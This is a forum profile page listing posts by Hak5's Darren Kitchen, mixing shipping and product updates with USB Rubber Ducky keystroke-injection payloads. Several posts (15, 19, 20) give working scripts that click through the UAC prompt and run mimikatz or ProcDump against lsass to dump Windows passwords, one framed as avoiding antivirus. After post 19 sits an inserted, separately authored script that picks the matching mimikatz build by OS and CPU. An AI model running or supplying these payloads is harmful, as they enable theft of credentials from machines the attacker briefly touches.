
Darren Kitchen

Root Admin
  • Posts: 4,887
  • Joined
  • Days Won: 248

Everything posted by Darren Kitchen

  1. Look, if you can't figure out how to set a static IP address I really can't help you. And you call yourself a hacker! :-P
  2. I'm working with a brokerage service to get all of the paperwork in line. We have a warehouse service in the UK picked out - it's just a matter of going through all the hoops. There are many. I'm in the process of getting a non-registration trade ID (meaning I'll be able to import goods without having to incorporate Hak5 in the UK as an Ltd). Once I have that I can get my electronic binding tariff information. When I get that I'll be able to register for an EORI and mail forms over to the UK government, at which point I'll wait around for them to update CHIEF, and once that's all done I can complete my C88 form for customs declarations and figure out our quarterly VAT returns... At which point I should be good to start my Shippers Export Declarations for freight with commercial invoices over 2500 USD and Bam! Then I can drop ship DDP or Delivered Duty Paid to the warehouse... What that means is we'll be paying the shipping to the UK (will be less than $40 in bulk) + the £17.40 UK VAT on your behalf, then we'll be available quick and easy throughout the euro zones. Thanks for your patience. I'll keep y'all updated as we get closer to launch on this.
  3. Here's the official manual in PDF http://wifipineapple.com/mk5/booklet.pdf This is exactly what went to print so you may notice bleed.
  4. Read over the included instruction guide. Also check out the previous booklet to familiarize yourself with pineapple fundamentals. Tune into the live stream this Wednesday (or watch it after the fact) and stay tuned for a forthcoming instructional video series. :)
  5. It's an ODM in China who's been around for over a decade making bags for big camera companies and retailers like B&H. Contractually I'm not at liberty to say, though I will point out UTG has similarly branded products. Oh the joys of international trade. Lemme tell you it's just another protocol to hack :). You'll enjoy the bag, we've gone with a top notch vendor.
  6. Murphy's 3rd law: "Make something idiot-proof, and they will build a better idiot" ;-)
  7. My copy pasta mistake. Should have read Mark V - Mark V (recursive much?). MK5 Karma is getting love, especially since we just leveled up this mouse! More soon. I'll be posting a PDF shortly.
  8. Copy pasta error. Fixed now. Sorry for the confusion. Mark Vs for everyone!
  9. Why, what's going on tonight? Are we supposed to be doing anything specific?
  10. I love this payload SO much! Great that it doesn't require any special privs. Here's my take using cmd instead of explorer so fewer delays are necessary. It's probably about the same speed but may be more reliable.

      REM Title: Youtube Startup Folder Roller
      REM Props: Morrolan
      DELAY 1000
      GUI r
      DELAY 100
      STRING cmd
      ENTER
      DELAY 200
      STRING cd "%userprofile%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\"
      ENTER
      STRING copy con "Google Chrome Assistant.url"
      ENTER
      STRING .url
      ENTER
      STRING [{000214A0-0000-0000-C000-000000000046}]
      ENTER
      STRING Prop3=19,2
      ENTER
      STRING [InternetShortcut]
      ENTER
      STRING URL=http://www.youtube.com/watch_popup?v=QH2-TGUlwu4&loop=1
      ENTER
      STRING IDList=
      ENTER
      CTRL z
      ENTER
      STRING exit
      ENTER

      Wicked fun :)
  11. Shipping to much of Europe is now as low as $6. The package is very small. Both the standard and deluxe weigh just 2 oz or less.
  12. USB configuration hasn't changed but I understand a lot has interface wise. Things are mostly in the same place but it looks different since 3.0. I'm working on a new booklet to cover this and anticipated the change when writing the current one so much of the fundamentals are absolutely still valid. It'll be online free of charge as soon as I have it completed. If there's something specific you're looking for feel free to ask here.
  13. vtecone, I understand your concern but I assure you - you aren't being ripped off. Typically orders go out next business day however our fraud prevention system detected a few concerns which put your order on hold. Usually we're able to resolve them in a timely manner however this particular order took a couple days longer than normal. I apologize for the inconvenience, I know the feeling of waiting on an order. Unfortunately in our business we have to scrutinize every order and when things don't match it's cause for concern. We reject a very high level of fraudulent orders which sadly delays a legitimate order every now and then. Once we've validated the credit card address and zip code that aren't matching we'll get your order out ASAP. I'm happy to upgrade the ground shipping to next day air in addition to my sincere apology. Feel free to reach out to me directly - darren@hak5.org. Regards, Darren
  14. Comment from Youtube on the latest episode featuring the payload suggests OS / CPU detection. The same could be done with ver to figure out if it's NT5 or NT6 and run the appropriate version of mimikatz. Any takers?
  15. Here's an updated version using a recommendation from Mubix that should speed it up ever so slightly.

      REM Author: Hak5Darren. Props: shutin, DyFukA, Mubix
      REM Description: Dump local wdigest passwords from memory using mimikatz
      REM Note: Uses c_duck_v2.1 firmware (Twin Duck) to execute mimikatz from
      REM SD card labeled "DUCKY" and save log file as %computername%-passwords.txt
      REM Target: Windows 7 x64 (target win32 with 32-bit binary)
      REM *** UAC Bypass ***
      DELAY 2000
      WINDOWS r
      DELAY 200
      STRING powershell Start-Process cmd.exe -Verb runAs
      ENTER
      DELAY 2000
      ALT y
      DELAY 500
      REM *** Define DUCKY drive as %duck% ***
      STRING for /f %d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set duck=%d
      ENTER
      DELAY 500
      REM *** Execute mimikatz from SD card and save log file to disk ***
      STRING %duck%\mimikatz_alpha_x64.exe "privilege::debug" "sekurlsa::logonPasswords full" "samdump::hashes" exit > %duck%\%computername%-passwords.txt
      ENTER
      REM *** GTFO ***
      STRING exit
      ENTER
      STRING exit
      ENTER
  16. We aim to please dude. Enjoy the technosaurus. It always amuses me what ends up in that "Special Request" box. We've sent some weird stuff man... Sara, who runs the HakShop, has become quite the artist. Wish I had a pic of the wizard she sent a few weeks ago.
  17. Think of how much fun that would be if it could be controlled over WWAN.
  18. It's not bringing up "Wireless Network Connection 2" and "Wireless Network Connection 3" most likely because they do not exist. In testing my target machine had 3 wireless adapters so I'd bring them all up. Most PCs will only have 1 labeled "Wireless Network Connection" (btw this is why I prefer Linux's wlan0, wlan1, wlan2, etc...)
  19. Here's a version of the Mimikatz password recovery payload that doesn't set off AV. See here for background: https://forums.hak5.org/index.php?/topic/29657-payload-ducky-script-using-mimikatz-to-dump-passwords-from-memory/ This uses the Twin Duck firmware and makes use of the Microsoft Sysinternals utility ProcDump.exe. While slower, the advantage here is that ProcDump.exe doesn't alarm anti-virus. Props to @mubix - I based this on his blog post http://www.room362.com/blog/2013/6/7/using-mimikatz-alpha-or-getting-clear-text-passwords-with-a.html I started a new thread because I'm curious if anyone has ideas on how this could be sped up. With the slow transfer speed of the twin duck and the largish filesize of the .dmp (42 MB on my system), would it be possible to save it locally then "grep" the important (smaller?) bits out before transferring them over?

      REM Author: Hak5Darren with the help of:
      REM @gentilkiwi, @Mubix, redmeatuk, shutin, DyFukA, Microsoft, Sysinternals
      REM
      REM Description: "Backup" Windows Passwords without setting off AntiVirus
      REM Dumps memory of lsass.exe using Microsoft Sysinternals util ProcDump
      REM Passwords can later be extracted using mimikatz.
      REM
      REM Firmware: Use c_duck_v2.1.hex firmware (Twin Duck) to execute from SD
      REM card labeled "DUCKY" and save log file as %COMPUTERNAME%_lsass.dmp
      REM Include procdump.exe on root of DUCKY SD card. Download ProcDump from:
      REM http://technet.microsoft.com/en-us/sysinternals/dd996900.aspx
      REM
      REM Target: Windows Vista/7/8, Win32/x64
      REM *** UAC Bypass ***
      DELAY 2000
      WINDOWS r
      DELAY 200
      STRING powershell Start-Process cmd.exe -Verb runAs
      ENTER
      DELAY 2000
      ALT y
      DELAY 500
      REM *** Define DUCKY drive as %duck% ***
      STRING for /f %d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set duck=%d
      ENTER
      DELAY 500
      REM *** Execute procdump from SD card and save log file to disk ***
      STRING %duck%\procdump.exe -accepteula -ma lsass.exe %duck%\%COMPUTERNAME%_lsass.dmp
      ENTER
      REM *** GTFO ***
      STRING exit
      ENTER
      REM *** Post Exploitation ***
      REM From your PC copy the %COMPUTERNAME%_lsass.dmp off the DUCKY SD card to a
      REM directory including the version of mimikatz for your target's architecture
      REM (NT5 win32, NT5 x64, NT6 win32 or NT6 x64) and run the following commands
      REM mimikatz.exe <enter>
      REM sekurlsa::minidump %COMPUTERNAME%_lsass.dmp <enter>
      REM sekurlsa::logonPasswords full <enter>

      I'm also curious if a powershell version could be created using this: https://github.com/mattifestation/PowerSploit/blob/master/Exfiltration/Out-Minidump.ps1
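Taking up the question in post 14 (use ver and the CPU architecture to pick the right mimikatz build) together with the four-build list in post 19, here is an added Ducky script that is not part of the original thread or of Darren's payloads. It keeps the elevation and DUCKY-drive stanzas from the payloads above unchanged and does the detection on the target itself in cmd, because the Ducky is keyboard-only and cannot read anything back. The folder layout on the card (\mimikatz\NT5\win32, \mimikatz\NT5\x64, \mimikatz\NT6\win32, \mimikatz\NT6\x64, each holding mimikatz.exe) is an assumption made for this example; rename to whatever you actually ship.

```duckyscript
REM Added example, not from the original thread
REM Description: Detect NT5/NT6 and win32/x64 on the target, then run the
REM matching mimikatz build from the DUCKY SD card
REM Assumes: c_duck_v2.1 (Twin Duck) firmware, SD card labeled "DUCKY", and a
REM hypothetical layout \mimikatz\<NT5|NT6>\<win32|x64>\mimikatz.exe on the card
REM *** UAC Bypass (same stanza as the thread's payloads) ***
DELAY 2000
WINDOWS r
DELAY 200
STRING powershell Start-Process cmd.exe -Verb runAs
ENTER
DELAY 2000
ALT y
DELAY 500
REM *** Define DUCKY drive as %duck% ***
STRING for /f %d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set duck=%d
ENTER
DELAY 500
REM *** Kernel family from ver: "Version 5.x" is XP/2003 (NT5), anything else here is NT6 ***
STRING ver | find "Version 5." >nul && (set nt=NT5) || (set nt=NT6)
ENTER
DELAY 200
REM *** Native CPU architecture. PROCESSOR_ARCHITEW6432 only exists inside a
REM *** 32-bit (WOW64) process on 64-bit Windows, where PROCESSOR_ARCHITECTURE
REM *** would misleadingly report x86, so it is checked first. ***
STRING if defined PROCESSOR_ARCHITEW6432 (set arch=x64) else if /i "%PROCESSOR_ARCHITECTURE%"=="AMD64" (set arch=x64) else (set arch=win32)
ENTER
DELAY 200
REM *** Run the build that matches the host; a 64-bit host needs the x64 build to read lsass ***
STRING %duck%\mimikatz\%nt%\%arch%\mimikatz.exe "privilege::debug" "sekurlsa::logonPasswords full" exit > %duck%\%COMPUTERNAME%-%nt%-%arch%-passwords.txt
ENTER
REM *** GTFO ***
STRING exit
ENTER
```

Each STRING line is typed into the interactive cmd window as its own command, so the %nt%, %arch% and %duck% variables set by one line are already expanded by the time the next line is parsed; no delayed expansion is needed as it would be inside a batch file. Two caveats on the NT5 branch: the elevation stanza is NT6-specific (XP has no UAC prompt and does not ship PowerShell by default), and the wmic drive lookup relies on Win32_Volume, which is not available on XP, so on a true NT5 target those two stanzas need replacing and the detection mainly earns its keep choosing win32 versus x64 on Vista/7/8 hosts.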
  20. Fantastic contribution. Here's a version I whipped up that uses c_duck_v2.1 firmware (Twin Duck) to execute mimikatz from the DUCKY SD card and save the password log file to disk.

      REM Author: Hak5Darren based on code from redmeatuk, shutin, DyFukA
      REM Description: Dump local wdigest passwords from memory using mimikatz
      REM Note: Uses c_duck_v2.1 firmware (Twin Duck) to execute mimikatz from
      REM SD card labeled "DUCKY" and save log file as %computername%-passwords.txt
      REM Target: Windows 7 x64 (target win32 with 32-bit binary)
      REM *** UAC Bypass ***
      DELAY 2000
      WINDOWS r
      DELAY 200
      STRING powershell Start-Process cmd.exe -Verb runAs
      ENTER
      DELAY 2000
      ALT y
      DELAY 500
      REM *** Define DUCKY drive as %duck% ***
      STRING for /f %d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set duck=%d
      ENTER
      DELAY 500
      REM *** Execute mimikatz from SD card and save log file to disk ***
      STRING %duck%\mimikatz_alpha_x64.exe > %duck%\%computername%-passwords.txt
      ENTER
      DELAY 100
      STRING privilege::debug
      ENTER
      STRING sekurlsa::logonPasswords full
      ENTER
      REM *** GTFO ***
      STRING exit
      ENTER
      STRING exit
      ENTER